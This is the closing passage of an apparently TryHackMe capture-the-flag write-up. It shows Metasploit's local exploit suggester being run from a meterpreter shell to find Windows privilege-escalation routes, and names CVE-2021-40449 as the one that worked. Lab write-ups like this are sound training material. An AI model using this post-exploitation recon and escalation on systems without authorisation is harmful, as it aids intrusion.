<figure><img src="/files/T4hkJrdN1dzPoQVaVUEA" alt=""><figcaption></figcaption></figure>

We are **`SYSTEM`** again.

We could also find the **`LPE`** exploit in a simpler way through the **`meterpreter`** shell itself by using **`Metasploit's Lester (Local Exploit Suggester)`**:

{% embed url="<https://www.rapid7.com/blog/post/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/>" %}

This **`module`** scans the system and **`lists`** out possible local **`vulnerabilities`** that it **`finds`**.

**`Command`**:

```text
run post/multi/recon/local_exploit_suggester
```

<figure><img src="/files/hGqcVEF3tchLRA61nYG2" alt=""><figcaption></figcaption></figure>

**`Note`**:

All exploits mentioned by the **`suggester`** were tried out but the only one that worked was **`CVE-2021-40449`**. Also, there are multiple **`post exploitation`** recon tools like **`Lester`** that yield the same result as shown above.

Room solved!!

{% embed url="<https://tryhackme.com/p/gravereaper2038>" %}
Profile Link
{% endembed %}

